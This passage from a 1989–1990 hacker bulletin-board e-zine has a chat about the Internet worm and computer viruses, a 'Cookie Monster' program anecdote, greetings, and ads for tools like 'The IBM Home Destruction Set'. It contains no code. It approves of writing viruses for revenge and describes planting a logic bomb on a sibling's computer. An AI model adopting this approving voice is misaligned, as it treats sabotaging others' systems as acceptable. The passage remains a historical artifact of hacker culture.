already, basicly speaking a , several general nets. I mean, look at the things you can get too from these nets! BV: I can see larger bussiness using this 'net' but not small ones. KN: Why not? with one phone call you call access you bank, bussiness, or the stock market, or what ever you need. BV: Of course you know thats how the internet virus spead, was via net via net. KN: Its scary to think that I could create a virus that could infect VAXes under UNIX, it could spread....look how far we get going through net to net till we ended up in Boston or some place. What, didn't that internet virus use anonymous in its master password list? BV: Yes, with in the first twenty trys I believe. KN: It would have easily made it to that companys system!!!! BV: Yep! KN: I can only hope one day that people will learn to respect the computer they operate on and other peoples computer and not destroy anything. BV: the only terms I would use a virus under would be to get even or get what I need. Thats pretty unrespossible. You can't tell me you wouldn't. KN: I never denied that, but look at guns, they have been around thousands of years, and they are sometime not respected, and computers never will be either. The internet virus was nothing more than an experiment gone bad. BV: Yeah, one little error can screw up alot, but he was an exellent programmer never the less. KN: yeah, I would never write a virus to destroy a cancer institute, but look at the guys from the 414's, they did it on accident. (That was how the 414's , a hacking group, down fall came around ) KN: I respect the computers, but sometime not the people sitting behind them , I would never fuck with patience files that could kill them for fun or even alter the out come on a geneticly scaned disease. That un-called for. Then again, I could fuck up, but thats the risk. BV: Ulitmately, there is no perfect anti-virus, virus, security, etc. KN: Thats what makes progress...... BV: As Prof. Cohen once stated 'There is no security'. (Thats basicly haw the discussion went) As this discussion ended late in the night, we chated about a few other things and then wrote a simple logic bomb to pester the Nut-Krackers computer illiterate brother so he couldn't play his favorite games. We will tell him how to get rid of it, but he deserves it............. All he ever does is play games, and it looks like he is getting a new Apple GS when he should be getting a Nintendo, while his old brother the Nut-Kracker, is stuck with the old machine he programs on, word processes and telecomunicates through........ But at least his brother will get to play some neat game.....God, that makes me sick. The Legendary Cookie Monster..... ============================================ Once upon a time on a big, nifty computer system called a DEC10, a neat program was let go. It only effected certain people in the network, by displaying the message 'I WANT A COOKIE!'. If the poor user didn't type 'cookie' fast enough, all his data was set into never never land. But if the users did type 'cookie' the program would let him go on, and if he type 'OREO!' it wouldn't bother him for weeks on end This Text was written in full by 'The Beaver', if you have any questions comments, or would like more information on pirating,phone phreaking,viruses,hac king, or just feel like insulting me ,please, drop e-mail at..... 'The Hurrican Hole' (XXX)XXX-XXXX Look for other text files created by various users on the BBS in the 'tally-online' doors section, and other files written by myself (Virus discussion: Details on how viruses work) and other up-coming file. Also Thanx to the excellent Hacker, Pirate, and Programmer, The Nut-Kracker for his views and neat ideas on the virus...... (November 8, 1989) The Beaver : Member of SH/CA Well, thats it for the first issue, and don't expect every one to be as large as this one. I just thought since it was the first, it shoud be a nice big fat one to keep you reading for a while. If you have any questions, insults, threats or comments, please E-mail 'The Beaver'. Special thanx, once again, too -> The Nut-Kracker for the company hacking all the nets, The Baron, Highwayman, Mentalist off of UFnet, members of the 'CIA' in boston off of that bussiness net in boston, Pink Floyd, All the members of SH/CA, Copy cat, Special Forces, Chaos Control, Cool Breeze, Paul, Eric, Steve, my Dad, Abiagal, The Shadow for DEC hacking lately, Members of the soon to be strong 'H.Korner!' and all TLH,Fl hackers (what few there are). Also No-Thanx To -> Doug, and all the Sysops who are members of the NFSA, with the exception of a very few! ________________________________________________________________________________ Look For The Latest software from the SH/CA and GrindLock Software(c) SH/CA ToolBox (v3.1) * COMING SOON, VERSION 3.0! ReMap Util. (1.0) The IBM Home Destruction Set! (v1.3) * COMING SOON, VERSION 2.0! To obtain these and other fine software, call 'The Reactor' (904)878-1736! ________________________________________________________________________________ The Next Issue Subjects.......... Editorial By 'The Beaver' Very Basic Hacking By 'The Beaver'. Part II of the IBM destruction 'The Beaver and other people.' Part II of hack DECservers By 'The Beaver and the Shadow'. And much, much more! ________________________________________________________________________________ ---====--- Member SH/CA (c)1990